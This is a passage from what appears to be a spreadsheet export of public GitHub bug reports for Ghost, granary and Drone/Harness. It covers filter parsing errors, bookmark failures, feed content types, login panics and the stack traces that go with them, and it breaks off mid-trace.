(req, res) =&gt; { res.send(`&lt;center style="font-size:160%"&gt; &lt;p&gt;This is Home Page &lt;/p&gt; ${await getMemberUrl(await getMember('catsarisky@gmail.com'))} ${await getAuthUrl(await getMember('catsarisky@gmail.com'))} `); } ); app.listen(3002);   Ghost Version 5.47  Node.js Version 16  How did you install Ghost? Ghost Pro, also local install on Windows, also 5.13 production  Database type MySQL 8  Browser &amp; OS version _No response_  Relevant log / error output _No response_  Code of Conduct - [X] I agree to be friendly and polite to people in this repository</t>
  </si>
  <si>
    <t>https://github.com/TryGhost/Ghost/issues/20133</t>
  </si>
  <si>
    <t>Author slug with one letter causes failed filter</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Summary A staff member that signs up with a single-letter first name upon invitation will not be able to use Ghost at all. They only see an error message in the Ghost admin:  Request not understood error, cannot list posts. Error parsing filter  ![CleanShot 2024-05-05 at 19 03 18@2x](https://github.com/TryGhost/Ghost/assets/25703384/52fe6ae4-32bd-487d-99d7-4ee759370d79) Looking at the network requests, the request to `/ghost/api/admin/posts/?formats=mobiledoc%2Clexical&amp;limit=30&amp;page=1&amp;filter=status%3A%5Bdraft%2Cscheduled%2Cpublished%2Csent%5D%2Bauthors%3Aj` fails. As soon as the last filter is removed, the API request succeeds: `https://tireless-buzzard.pikapod.net/ghost/api/admin/posts/?formats=mobiledoc%2Clexical&amp;limit=30&amp;page=1&amp;filter=status%3A%5Bdraft%2Cscheduled%2Cpublished%2Csent%5D` I have then tried to change the author slug in the database from "j" to "jb"  and things started to work. This has been tested in different environments, both locally with development configurations, as well as on different managed hosts. Ghost v5.82.2 and v5.82.6 have been tested, both from the CLI as well as Docker images.  Steps to Reproduce 1. Invite a new staff member as contributor 2. Accept the invitation and register  IMPORTANT: Set the name to have a single-letter first name, e.g. "J Doe" instead of "John Doe" 3. See the error  Ghost Version v5.82.6  Node.js Version 18 LTS  How did you install Ghost? Ghost CLI  Database type MySQL 8  Browser &amp; OS version Mac OS 14.4.1, latest Chrome and latest Safari tested  Relevant log / error output shell [2024-05-05 16:55:19] ERROR "GET /ghost/api/admin/posts/?formats=mobiledoc%2Clexical&amp;limit=30&amp;page=1&amp;filter=status%3A%5Bdraft%2Cscheduled%2Cpublished%2Csent%5D%2Bauthors%3Aj" 400 12ms Error parsing filter Error ID: 415527a0-0b00-11ef-96dc-2bc1b8db7476  Error: Query Error: unrecognized text "j" in filter at char 24 at Child.applyDefaultAndCustomFilters (/var/lib/ghost/versions/5.82.2/node_modules/@tryghost/bookshelf-filter/lib/bookshelf-filter.js:66:23) ished,sent]+authors:j)+type:post ^ at lexer.parseError (/var/lib/ghost/versions/5.82.2/node_modules/@tryghost/nql-lang/dist/parser.js:760:11) at Object.next (/var/lib/ghost/versions/5.82.2/node_modules/@tryghost/nql-lang/dist/parser.js:625:25) at Object.lex (/var/lib/ghost/versions/5.82.2/node_modules/@tryghost/nql-lang/dist/parser.js:635:22) at lex (/var/lib/ghost/versions/5.82.2/node_modules/@tryghost/nql-lang/dist/parser.js:246:27) at Parser.parse (/var/lib/ghost/versions/5.82.2/node_modules/@tryghost/nql-lang/dist/parser.js:259:26) at exports.parse (/var/lib/ghost/versions/5.82.2/node_modules/@tryghost/nql-lang/lib/nql.js:18:44) at api.parse (/var/lib/ghost/versions/5.82.2/node_modules/@tryghost/nql/lib/nql.js:15:31) at api.querySQL (/var/lib/ghost/versions/5.82.2/node_modules/@tryghost/nql/lib/nql.js:49:44) at Builder.&lt;anonymous&gt; (/var/lib/ghost/versions/5.82.2/node_modules/@tryghost/bookshelf-filter/lib/bookshelf-filter.js:63:24) at Object.query (/var/lib/ghost/versions/5.82.2/node_modules/bookshelf/lib/helpers.js:164:14) at Child.query (/var/lib/ghost/versions/5.82.2/node_modules/bookshelf/lib/model.js:1387:22) at Child.applyDefaultAndCustomFilters (/var/lib/ghost/versions/5.82.2/node_modules/@tryghost/bookshelf-filter/lib/bookshelf-filter.js:56:22) at Function.getFilteredCollection (/var/lib/ghost/versions/5.82.2/core/server/models/base/plugins/filtered-collection.js:13:32) at Function.findPage (/var/lib/ghost/versions/5.82.2/core/server/models/base/plugins/crud.js:83:41) at PostsService.browsePosts (/var/lib/ghost/versions/5.82.2/node_modules/@tryghost/posts-service/lib/PostsService.js:81:44) at Object.query (/var/lib/ghost/versions/5.82.2/core/server/api/endpoints/posts.js:73:33)   Code of Conduct - [X] I agree to be friendly and polite to people in this repository</t>
  </si>
  <si>
    <t>https://github.com/TryGhost/Ghost/issues/20445</t>
  </si>
  <si>
    <t>Bookmark for YouTube links not working</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Summary Adding a bookmark card with a link to YouTube seems to have broken in v5.86.0. Previously, adding a bookmark card with a valid link to a YouTube video resulted in this: ![CleanShot 2024-06-23 at 14 59 44@2x](https://github.com/TryGhost/Ghost/assets/25703384/44000a43-9c13-4823-a50a-143cb1ef3123) Response from XXX in v5.85.2:  { "version": "1.0", "type": "bookmark", "url": "https://www.youtube.com/watch?v=aqz-KE-bpKQ", "metadata": { "url": "https://www.youtube.com/watch?v=aqz-KE-bpKQ", "title": "Big Buck Bunny 60fps 4K - Official Blender Foundation Short Film", "description": "Enjoy this UHD High Frame rate version of one of the iconic short films produced by Blender Institute!Learn more about the project here http://bbb3d.renderfa", "author": null, "publisher": "YouTube", "thumbnail": "https://i.ytimg.com/vi/aqz-KE-bpKQ/maxresdefault.jpg", "icon": "https://www.youtube.com/s/desktop/9f65bf98/img/favicon_144x144.png" } }  From v5.86.0 onwards (tested in v5.86.1 as well), the same link in a bookmark card produces an error: ![CleanShot 2024-06-23 at 15 00 22@2x](https://github.com/TryGhost/Ghost/assets/25703384/2597c59b-b7d2-4d82-be45-7230d5c19580) Response from XXX in v5.86.0 and v5.86.1:  { "errors": [ { "message": "Validation error, cannot read oembed.", "context": "URL contains insufficient metadata. https://www.youtube.com/watch?v=aqz-KE-bpKQ", "type": "ValidationError", "details": null, "property": null, "help": null, "code": null, "id": "8c6cb290-3160-11ef-bc69-01c02bf2f945", "ghostErrorCode": null } ] }   Steps to Reproduce 1. Create a new post in v5.86.0 or v5.86.1 2. Add a bookmark card 3. Enter any YouTube URL (for example https://www.youtube.com/watch?v=aqz-KE-bpKQ) 4. Error is shown  Ghost Version v5.86.0  Node.js Version 18 LTS  How did you install Ghost? Ubuntu 22.04 with Ghost CLI  Database type MySQL 8  Browser &amp; OS version _No response_  Relevant log / error output _No response_  Code of Conduct - [X] I agree to be friendly and polite to people in this repository</t>
  </si>
  <si>
    <t>https://github.com/TryGhost/Ghost/issues/20634</t>
  </si>
  <si>
    <t>The RSS feed endpoint returns a wrong content type</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Summary When requesting an RSS feed from a ghost blog (e.g. https://activitypub.ghost.org/rss/), the returned content-type is `content-type: text/xml; charset=utf-8` (as you can see in [this file](https://github.com/TryGhost/Ghost/blob/main/ghost/core/core/frontend/services/rss/renderer.js)). This can result in the feed not being correctly displayed: |How it is displayed|How it should be displayed (with an Add-on for RSS feeds)| ||| |![grafik](https://github.com/user-attachments/assets/6bd50845-9533-4176-a428-64361f79c99d)|![grafik](https://github.com/user-attachments/assets/609aa980-bf8c-4dcd-9025-26789039980d)| As far as I can see, it should be `application/rss+xml`. (Sources: [[1]](https://datatracker.ietf.org/doc/id/draft-nottingham-rss-media-type-00), [[2]](https://stackoverflow.com/questions/595616/what-is-the-correct-mime-type-to-use-for-an-rss-feed)).  Steps to Reproduce 1. Open the RSS feed URL from any ghost blog (e.g. https://activitypub.ghost.org/rss/) 2. Open the developer tools from the browser, look into the network tab. 3. (Sometimes required:) Refresh the site 4. Click on the request of the main request. 5. See in the Response Headers: `content-type: text/xml; charset=utf-8`  Ghost Version 5.87.3  Node.js Version (I don't see that with docker?)  How did you install Ghost? Using a docker container on a debian 12 server.  Database type MySQL 8  Browser &amp; OS version Firefox 128.0 (64-Bit) on Windows 11 Pro  Relevant log / error output _No response_  Code of Conduct - [X] I agree to be friendly and polite to people in this repository</t>
  </si>
  <si>
    <t>https://github.com/TryGhost/Ghost/issues/21123</t>
  </si>
  <si>
    <t>Tips and Donation Feature - Request URL Issue</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Summary Hello, I am new to ghost so please let me know if I can offer further clarification to my problem. Thank you. I have a self-hosted ghost install, and I updated ghost to include the tips/donation feature. When I visit: https://domain.com/blog/#/portal/support, there is an issue with these two requests: session/ | 404 | fetch | FeedbackPage.js:12 create-stripe-checkout-session/ | 404 | fetch | FeedbackPage.js:12 and I see this message in the browser: Sorry, that didnt work. Something went wrong, please try again later. The request urls look like this: Request URL: https://domain.com/members/api/session/ Request URL: https://domain.com/members/api/create-stripe-checkout-session/ however I am expecting them to be: Request URL: https://domain.com/blog/members/api/session/ Request URL: https://domain.com/blog/members/api/create-stripe-checkout-session/ as https://domain.com/blog is what is setup in my ghost config Also, if I visit https://domain.com/blog/#/portal/signup this request, for example, returns 204 Fetchmember/ 204 fetch FeedbackPage.js:12 with the following request url: Request URL: https://domain.com/blog/members/api/member/ I am trying to understand why /blog/ is not being included in the requests sent when visiting https://domain.com/blog/#/portal/support For example, if I run curl -i https://domain.com/blog/members/api/session/ I get a 204 response. Thank you for your help. - Sally  Steps to Reproduce Assumes self-hosted ghost installation where ghost is located here: https://domain.com/blog Update ghost to include tips/donations Expected request url to match and behave similarly to #/portal/signup  Ghost Version 5.92.0  Node.js Version 18.20.4  How did you install Ghost? Digital Ocean Ubuntu  Database type MySQL 8  Browser &amp; OS version _No response_  Relevant log / error output _No response_  Code of Conduct - [X] I agree to be friendly and polite to people in this repository</t>
  </si>
  <si>
    <t>https://github.com/TryGhost/Ghost/issues/22023</t>
  </si>
  <si>
    <t>API has different max length for feature_image_alt than editor. API 190 / Editor 125</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Summary Updating feature_image_alt over admin API allows 190 characters. The Editor will only allow 125 A feature_image_alt up to 190 characters is accepted when updating a post at `/admin/posts/{{id}}` When editing the same posts and saving, the error "Update failed: Feature image alt text cannot be longer than 125 characters." is displayed. See screenshot. &lt;img width="814" alt="Image" src="https://github.com/user-attachments/assets/1e0b6091-403b-4c80-bf82-e0335b370b0e" /&gt;  Steps to Reproduce 1. Update a post over API `/admin/posts/{{id}}` with string longer than 125 characters, ex { "feature_image_alt" : "The image shows a wet, pink-lit city street with a car in the background and a person in a coat standing in the foreground." } 2. Open the posts in Editor, attempt to save. Expecting Editor &amp; admin API to have the same max length, 190 characters  Ghost Version 5.106.1-0-ga963b514+moya  Node.js Version N/A  How did you install Ghost? GhostPro  Database type MySQL 5.7  Browser &amp; OS version N/A  Relevant log / error output shell Update failed: Feature image alt text cannot be longer than 125 characters.   Code of Conduct - [x] I agree to be friendly and polite to people in this repository</t>
  </si>
  <si>
    <t>https://github.com/TryGhost/Ghost/issues/22328</t>
  </si>
  <si>
    <t>Comments exposes a 'hide' button even for staff roles that shouldn't see it.</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Summary I'm logged in as an editor on a Ghost pro site. I'm not logged in as a member When I view comments, I can see the "" with hide behind it. Clicking Hide causes the comment to grey out, but doesn't actually hide it (comment reappears on reload). Aside: I'm about to give editors permissions to hide comments anyway, so maybe I'll write a test that shows that they can (and authors can't).  Steps to Reproduce See above.  Ghost Version Ghost Pro, 5.110.2  Node.js Version na  How did you install Ghost? na  Database type MySQL 8  Browser &amp; OS version chrome, windows 11  Relevant log / error output shell Browser shows a 500 status code because I don't have permissions to hide the comment.   Code of Conduct - [x] I agree to be friendly and polite to people in this repository</t>
  </si>
  <si>
    <t>https://github.com/TryGhost/Ghost/issues/22764</t>
  </si>
  <si>
    <t>Search should match results with accents if term does not include them</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Summary If a post title of page include accents, the search results should include those in the results, whether there are accents or not  Steps to Reproduce 1. Create a post with the title Rene Zellweger (note the accented ) 2. Search for this using renee as the term 3. Observe no results  Ghost Version 1.108.1  Node.js Version 18  How did you install Ghost? Ghost(Pro)  Database type MySQL 8  Browser &amp; OS version All  Relevant log / error output shell   Code of Conduct - [x] I agree to be friendly and polite to people in this repository</t>
  </si>
  <si>
    <t>https://github.com/snarfed/granary/issues/18</t>
  </si>
  <si>
    <t>Twitter: fetch an arbitrary user's timeline</t>
  </si>
  <si>
    <t>&gt; (1:05:01 PM) kylewm: snarfed: hey is it possible with twitter-activitystreams to list someone else's &gt; tweets (for use with shrewdness)? i tried /(username)/@all but it's the same as /@me/@all &gt; &gt; (1:14:35 PM) snarfed: kylewm: yeah, rest api doesn't support it but it should. pretty easy fix, we just &gt; need to add screen_name or user_id to API_SELF_TIMELINE_URL here: &gt; https://github.com/snarfed/activitystreams-unofficial/tree/master/twitter.py#L183</t>
  </si>
  <si>
    <t>https://github.com/snarfed/granary/issues/22</t>
  </si>
  <si>
    <t>reply with photo</t>
  </si>
  <si>
    <t>https://github.com/snarfed/activitystreams-unofficial/blob/master/twitter.py#L549 Seems replies and photos are mutually exclusive due to that line. Bridgy can't seem to post a photo reply for instance: https://kartikprabhu.com/notes/crispy-salmon</t>
  </si>
  <si>
    <t>https://github.com/snarfed/granary/issues/101</t>
  </si>
  <si>
    <t>add appropriate content-type headers for XML feed</t>
  </si>
  <si>
    <t>When I view a granary feed in chrome, I see a lot of text. When I view other feeds, chrome renders it as an XML tree. I see granary sets a content-type header of `text/xml` which I would have thought would work, but on a feed that looks right in the browser I see that the content type is `application/xml`. Compare: https://voxpelli.com/english.xml ![xml-feed](https://media.aaronpk.com/Screen-Shot-2017-01-21-12-25-20.png) https://granary-demo.appspot.com/url?input=html&amp;output=atom&amp;url=https%3A%2F%2Fnews.indieweb.org%2Fen ![text](https://media.aaronpk.com/Screen-Shot-2017-01-21-12-25-37.png)</t>
  </si>
  <si>
    <t>https://github.com/snarfed/granary/issues/127</t>
  </si>
  <si>
    <t>Instagram dates do not include timezone offset</t>
  </si>
  <si>
    <t>It looks like Granary is displaying dates from Instagram feeds as UTC, but then not including the timezone offset. (I'm using the Instagram to HTML conversion). It should either explicitly set the `+0000` or `Z` offset if it's converting to UTC, or if it knows the local time then set that offset instead. (XRay looks up the timezone for the photo's location and converts it to a local time, but you might not want to do that.)</t>
  </si>
  <si>
    <t>https://github.com/snarfed/granary/issues/135</t>
  </si>
  <si>
    <t>possible cache leak</t>
  </si>
  <si>
    <t>granary serves some feeds that are moderately high traffic, e.g. @aaronpk's and @gregorlove's (hi!), so it currently caches responses for 5m to avoid hammering their sites. @aaronpk noticed a possible cache leak: he tried a twitter search for one query, then another, and got the same results as the first. maybe we're excluding search query from the cache key? seems unlikely since we cache the full url, but still.</t>
  </si>
  <si>
    <t>https://github.com/snarfed/granary/issues/146</t>
  </si>
  <si>
    <t>JSON Feed of Instagram posts should include the images inline</t>
  </si>
  <si>
    <t>It seems that prior to your fix for #120, images were duplicated in some of the output formats. As part of the fix you special-cased Atom so that the image would still be included within the entrys `&lt;content&gt;`. I think that JSON Feed should be getting the same treatment. I subscribed to an Instagram-via-Granary JSON Feed in Feedbin and while it shows the photos in the article list, the photos dont actually appear in the content of the article. (In ReadKit for macOS and Reeder for iOS, which use Feedbin as a backend, the photo doesnt appear anywhere at all.) The [JSON Feed spec](https://jsonfeed.org/version/1) also implies that featured images should be included in the `content_html` in addition to being listed in the `image` property.</t>
  </si>
  <si>
    <t>https://github.com/snarfed/granary/issues/214</t>
  </si>
  <si>
    <t>use synthetic permalinks for like/share publishes on twitter, mastodon</t>
  </si>
  <si>
    <t>currently we're only returning the URL of the liked/shared post. instead, we should generate and return the same synthetic like/share permalinks that we already use in other places, eg https://twitter.com/foo/status/123#liked-by-456 . [requested here](https://chat.indieweb.org/dev/2020-06-12#t1592000648266500) by @jalcine. thanks for the nudge!</t>
  </si>
  <si>
    <t>https://github.com/snarfed/granary/issues/752</t>
  </si>
  <si>
    <t>Incorrect use of `atom:uri` element</t>
  </si>
  <si>
    <t>https://github.com/snarfed/granary/blob/main/granary/atom.py#L265 py a = { 'objectType': 'activity', 'verb': _as1_value(entry, 'verb') or 'post', 'id': _text(entry, 'id') or (obj['id'] if obj_elem is None else None), 'url': _text(entry, 'uri') or (obj['url'] if obj_elem is None else None), 'object': obj, 'actor': _author_to_actor(entry, feed_author=feed_author), 'inReplyTo': obj.get('inReplyTo'), }  [`atom:uri`](https://datatracker.ietf.org/doc/html/rfc4287#section-3.2.2) element doesn't do what you think it does. Correct way of getting a URL from an entry is `href` attribute of [`atom:link`](https://datatracker.ietf.org/doc/html/rfc4287#section-4.2.7) element.</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/31</t>
  </si>
  <si>
    <t>More verbose logs and server answers</t>
  </si>
  <si>
    <t>This is low priority, but seems like drone doesn't like to tell user what is wrong. For example it only sends error messages like `Not found` or `Unauthorized` without context.</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/265</t>
  </si>
  <si>
    <t>URLs from Slack and github has been broken.</t>
  </si>
  <si>
    <t>Seems https://github.com/drone/drone/pull/247/files changed to require a branch parameter, which is missing from some of the places that links to build, at least for me slack notify and link from github pull request are failing now. They use these urls respectively: from slack: http://myserver.com/github.com/Nordaaker/Input/commit/14fb2f277a7fa5042b2b2ef67cda2dc5e0018c3d gives sql: no rows in result set and from github: http://myserver.com/github.com/Nordaaker/Input/commit/reset-pwd/14fb2f277a7fa5042b2b2ef67cda2dc5e0018c3d (Github pull requests - gives a 404) Not sure if the right fix here is to make those old urls work or to only use the first format with ?branch=&lt;&gt; added.</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/443</t>
  </si>
  <si>
    <t>0.3 github login fails</t>
  </si>
  <si>
    <t xml:space="preserve">- open /login - click Github login - error shown in browser: received empty access token from authorization server The log is showing:  Sep 05 15:12:36 support-2 bash[32386]: 2014/09/05 15:12:36 http: panic serving 212.238.236.125:56129: runtime error: invalid memory address or nil pointer dereference Sep 05 15:12:36 support-2 bash[32386]: goroutine 19 [running]: Sep 05 15:12:36 support-2 bash[32386]: net/http.func009() Sep 05 15:12:36 support-2 bash[32386]: /usr/local/go/src/pkg/net/http/server.go:1093 +0xae Sep 05 15:12:36 support-2 bash[32386]: runtime.panic(0x999660, 0x12f5da8) Sep 05 15:12:36 support-2 bash[32386]: /usr/local/go/src/pkg/runtime/panic.c:248 +0x106 Sep 05 15:12:36 support-2 bash[32386]: github.com/drone/drone/plugin/remote/github.(*GitHub).Authorize(0xc2100e0380, 0x7f32ffb55d20, 0xc2101440a0, 0xc2100c8410, 0xa, ) Sep 05 15:12:36 support-2 bash[32386]: /var/cache/drone/src/github.com/drone/drone/plugin/remote/github/github.go:95 +0x86b Sep 05 15:12:36 support-2 bash[32386]: github.com/drone/drone/server/handler.(*LoginHandler).GetLogin(0xc210034f00, 0x7f32ffb55d20, 0xc2101440a0, 0xc2100c8410, 0x7f32ff9c9b80, ) Sep 05 15:12:36 support-2 bash[32386]: /var/cache/drone/src/github.com/drone/drone/server/handler/login.go:39 +0x19c Sep 05 15:12:36 support-2 bash[32386]: github.com/drone/drone/server/handler.*LoginHandler.GetLoginfm(0x7f32ffb55d20, 0xc2101440a0, 0xc2100c8410, 0x0, 0x0) Sep 05 15:12:36 support-2 bash[32386]: /var/cache/drone/src/github.com/drone/drone/server/handler/login.go:158 +0x56 Sep 05 15:12:36 support-2 bash[32386]: github.com/drone/drone/server/handler.func002(0x7f32ffb55d20, 0xc2101440a0, 0xc2100c8410) Sep 05 15:12:36 support-2 bash[32386]: /var/cache/drone/src/github.com/drone/drone/server/handler/error.go:32 +0x53 Sep 05 15:12:36 support-2 bash[32386]: net/http.HandlerFunc.ServeHTTP(0xc21010e340, 0x7f32ffb55d20, 0xc2101440a0, 0xc2100c8410) Sep 05 15:12:36 support-2 bash[32386]: /usr/local/go/src/pkg/net/http/server.go:1220 +0x40 Sep 05 15:12:36 support-2 bash[32386]: github.com/gorilla/pat.(*Router).ServeHTTP(0xc210096370, 0x7f32ffb55d20, 0xc2101440a0, 0xc2100c8410) Sep 05 15:12:36 support-2 bash[32386]: /var/cache/drone/src/github.com/gorilla/pat/pat.go:75 +0x1b8 Sep 05 15:12:36 support-2 bash[32386]: main.func001(0x7f32ffb55d20, 0xc2101440a0, 0xc2100c8410) Sep 05 15:12:36 support-2 bash[32386]: /var/cache/drone/src/github.com/drone/drone/server/main.go:150 +0x4f7 Sep 05 15:12:36 support-2 bash[32386]: net/http.HandlerFunc.ServeHTTP(0xc2101407e0, 0x7f32ffb55d20, 0xc2101440a0, 0xc2100c8410) Sep 05 15:12:36 support-2 bash[32386]: /usr/local/go/src/pkg/net/http/server.go:1220 +0x40 Sep 05 15:12:36 support-2 bash[32386]: net/http.(*ServeMux).ServeHTTP(0xc2100338d0, 0x7f32ffb55d20, 0xc2101440a0, 0xc2100c8410) Sep 05 15:12:36 support-2 bash[32386]: /usr/local/go/src/pkg/net/http/server.go:1496 +0x163 Sep 05 15:12:36 support-2 bash[32386]: net/http.serverHandler.ServeHTTP(0xc21014a050, 0x7f32ffb55d20, 0xc2101440a0, 0xc2100c8410) Sep 05 15:12:36 support-2 bash[32386]: /usr/local/go/src/pkg/net/http/server.go:1597 +0x16e Sep 05 15:12:36 support-2 bash[32386]: net/http.(*conn).serve(0xc21011d700) Sep 05 15:12:36 support-2 bash[32386]: /usr/local/go/src/pkg/net/http/server.go:1167 +0x7b7 Sep 05 15:12:36 support-2 bash[32386]: created by net/http.(*Server).Serve Sep 05 15:12:36 support-2 bash[32386]: /usr/local/go/src/pkg/net/http/server.go:1644 +0x28b Sep 05 15:12:36 support-2 bash[32386]: 2014/09/05 15:12:36 GET /login/github.com Sep 05 15:12:36 support-2 bash[32386]: 2014/09/05 15:12:36 received empty access token from authorization server </t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/474</t>
  </si>
  <si>
    <t>"Method Not Allowed" after login when clicking "Rebuild" with expired session</t>
  </si>
  <si>
    <t>When clicking "Rebuild" with an expired session the POST request redirects you to /login with the return_url set to the URL of post request. And after the login it does a GET request to that URL which is declined with "Method Not Allowed".</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/477</t>
  </si>
  <si>
    <t>Gravatars no longer showing up</t>
  </si>
  <si>
    <t>So I'm working on the drone wall project, and consuming the "gravatar" field to get people's faces to show up. A few days, ago, most gravatar fields started coming back blank. Some research yielded the following: https://developer.github.com/changes/2014-09-05-removing-gravatar-id/ Would it be possible for drone to surface this avatar_url field rather than (or in addition to) the now-empty gravatar one?</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/481</t>
  </si>
  <si>
    <t>0.3 Release, POST to /v1/remotes is not found</t>
  </si>
  <si>
    <t>On latest build I have error, when trying to configure Github/Github enterprise:  Request URL:http://drone-dev.yandex.net/v1/remotes Request Method:POST Status Code:404 Not Found  May be it caused by wrong URL (without concrete remote plugin) passed to client.</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/495</t>
  </si>
  <si>
    <t>[exp] Gitlab Auth issue</t>
  </si>
  <si>
    <t xml:space="preserve">since last commits, i can't auth via gitlab, got NotFound Ok, go to `server/main.go` and add handler:  go goji.Post("/api/auth/:host", handler.GetLogin)  Launch drone, and test: Internal Error  @iMac  drone rvm:(ruby-2.1.3) git:(exp)  ./debian/drone/usr/local/bin/droned --config=./drone.conf 2014/10/01 19:38:16.206024 Starting Goji on [::]:8000 2014/10/01 19:40:23.911282 [iMac-Kirill/224rnGM5Au-000001] Started POST "/api/auth/git.teobit.ru" from 127.0.0.1:58796 2014/10/01 19:40:24.265804 [iMac-Kirill/224rnGM5Au-000001] Returning 400 in 354.500938ms 2014/10/01 19:40:24.635285 [iMac-Kirill/224rnGM5Au-000002] Started GET "/favicon.ico" from 127.0.0.1:58796 2014/10/01 19:40:24.635454 [iMac-Kirill/224rnGM5Au-000002] Returning 200 in 142.609us 2014/10/01 19:45:25.809654 [iMac-Kirill/224rnGM5Au-000003] Started POST "/api/auth/git.teobit.ru" from 127.0.0.1:58796 2014/10/01 19:45:26.090742 [iMac-Kirill/224rnGM5Au-000003] Returning 400 in 281.071105ms 2014/10/01 19:45:26.497144 [iMac-Kirill/224rnGM5Au-000004] Started GET "/favicon.ico" from 127.0.0.1:58796 2014/10/01 19:45:26.497312 [iMac-Kirill/224rnGM5Au-000004] Returning 200 in 145.985us 2014/10/01 19:45:28.678011 [iMac-Kirill/224rnGM5Au-000005] Started GET "/gitlab" from 127.0.0.1:58796 2014/10/01 19:45:28.678176 [iMac-Kirill/224rnGM5Au-000005] Returning 200 in 139.485us 2014/10/01 19:45:28.861238 [iMac-Kirill/224rnGM5Au-000006] Started GET "/api/user" from 127.0.0.1:58796 invalid token 2014/10/01 19:45:28.861321 [iMac-Kirill/224rnGM5Au-000006] Returning 401 in 64.215us 2014/10/01 19:45:29.041267 [iMac-Kirill/224rnGM5Au-000007] Started GET "/api/stream/user" from 127.0.0.1:63467 2014/10/01 19:45:29.137947 [iMac-Kirill/224rnGM5Au-000008] Started GET "/favicon.ico" from 127.0.0.1:58796 2014/10/01 19:45:29.138098 [iMac-Kirill/224rnGM5Au-000008] Returning 200 in 124.012us 2014/10/01 19:45:30.498867 [iMac-Kirill/224rnGM5Au-000009] Started POST "/api/auth/gitlab.com" from 127.0.0.1:58796 2014/10/01 19:45:31.000913 [iMac-Kirill/224rnGM5Au-000009] panic: interface conversion: interface is nil, not capability.Capability /Users/bugagazavr/Documents/Go/src/github.com/zenazn/goji/web/middleware/recoverer.go:24 (0x42cd86b) func.006: debug.PrintStack() /usr/local/Cellar/go/1.3.2/libexec/src/pkg/runtime/panic.c:248 (0x40cbdfd) panic: runtimenewstackcall(d-&gt;fn, (byte*)d-&gt;args, d-&gt;siz); /usr/local/Cellar/go/1.3.2/libexec/src/pkg/runtime/iface.goc:292 (0x40dea10) assertE2Tret: runtimepanic(err); /usr/local/Cellar/go/1.3.2/libexec/src/pkg/runtime/iface.goc:280 (0x40de990) assertE2T: assertE2Tret(t, e, (byte*)&amp;retbase); /Users/bugagazavr/Documents/Go/src/github.com/drone/drone/server/capability/context.go:31 (0x42af94c) FromContext: return c.Value(reqkey).(Capability) /Users/bugagazavr/Documents/Go/src/github.com/drone/drone/server/capability/capability.go:22 (0x42af871) Enabled: return FromContext(c).Get(key) /Users/bugagazavr/Documents/Go/src/github.com/drone/drone/server/handler/login.go:51 (0x415295d) GetLogin: if capability.Enabled(ctx, capability.Registration) == false { /Users/bugagazavr/Documents/Go/src/github.com/zenazn/goji/web/web.go:127 (0x416e894) HandlerFunc.ServeHTTPC: h(c, w, r) /Users/bugagazavr/Documents/Go/src/github.com/zenazn/goji/web/router.go:210 (0x416d5a9) routeMachine.route: rm.routes[si].handler.ServeHTTPC(*c, w, r) /Users/bugagazavr/Documents/Go/src/github.com/zenazn/goji/web/router.go:250 (0x416d91a) (*router).route: methods, ok := rm.route(c, w, r) /Users/bugagazavr/Documents/Go/src/github.com/zenazn/goji/web/middleware.go:94 (0x416e96f) func.002: router.route(&amp;cs.C, w, r) /usr/local/Cellar/go/1.3.2/libexec/src/pkg/net/http/server.go:1235 (0x412b2b0) HandlerFunc.ServeHTTP: f(w, r) /Users/bugagazavr/Documents/Go/src/github.com/drone/drone/server/middleware/user.go:21 (0x415c819) func.005: h.ServeHTTP(w, r) /usr/local/Cellar/go/1.3.2/libexec/src/pkg/net/http/server.go:1235 (0x412b2b0) HandlerFunc.ServeHTTP: f(w, r) /Users/bugagazavr/Documents/Go/src/github.com/drone/drone/server/middleware/header.go:25 (0x415b9bf) func.001: h.ServeHTTP(w, r) /usr/local/Cellar/go/1.3.2/libexec/src/pkg/net/http/server.go:1235 (0x412b2b0) HandlerFunc.ServeHTTP: f(w, r) /Users/bugagazavr/Documents/Go/src/github.com/drone/drone/server/main.go:190 (0x40bd6d5) func.002: h.ServeHTTP(w, r) /usr/local/Cellar/go/1.3.2/libexec/src/pkg/net/http/server.go:1235 (0x412b2b0) HandlerFunc.ServeHTTP: f(w, r) /Users/bugagazavr/Documents/Go/src/github.com/zenazn/goji/web/middleware/options.go:70 (0x42cd7ab) func.004: h.ServeHTTP(w, r) /usr/local/Cellar/go/1.3.2/libexec/src/pkg/net/http/server.go:1235 (0x412b2b0) HandlerFunc.ServeHTTP: f(w, r) /Users/bugagazavr/Documents/Go/src/github.com/zenazn/goji/web/middleware/recoverer.go:29 (0x42cda29) func.007: h.ServeHTTP(w, r) /usr/local/Cellar/go/1.3.2/libexec/src/pkg/net/http/server.go:1235 (0x412b2b0) HandlerFunc.ServeHTTP: f(w, r) /Users/bugagazavr/Documents/Go/src/github.com/zenazn/goji/web/middleware/logger.go:28 (0x42cd4a0) func.002: h.ServeHTTP(lw, r) /usr/local/Cellar/go/1.3.2/libexec/src/pkg/net/http/server.go:1235 (0x412b2b0) HandlerFunc.ServeHTTP: f(w, r) /Users/bugagazavr/Documents/Go/src/github.com/zenazn/goji/web/middleware/request_id.go:68 (0x42cdd5f) func.008: h.ServeHTTP(w, r) /usr/local/Cellar/go/1.3.2/libexec/src/pkg/net/http/server.go:1235 (0x412b2b0) HandlerFunc.ServeHTTP: f(w, r) /Users/bugagazavr/Documents/Go/src/github.com/zenazn/goji/web/middleware.go:51 (0x4169b9f) (*cStack).ServeHTTP: s.m.ServeHTTP(w, r) /Users/bugagazavr/Documents/Go/src/github.com/zenazn/goji/web/mux.go:77 (0x416ad1f) (*Mux).ServeHTTP: stack.ServeHTTP(w, r) /usr/local/Cellar/go/1.3.2/libexec/src/pkg/net/http/server.go:1511 (0x412ca83) (*ServeMux).ServeHTTP: h.ServeHTTP(w, r) /usr/local/Cellar/go/1.3.2/libexec/src/pkg/net/http/server.go:1673 (0x412d3af) serverHandler.ServeHTTP: 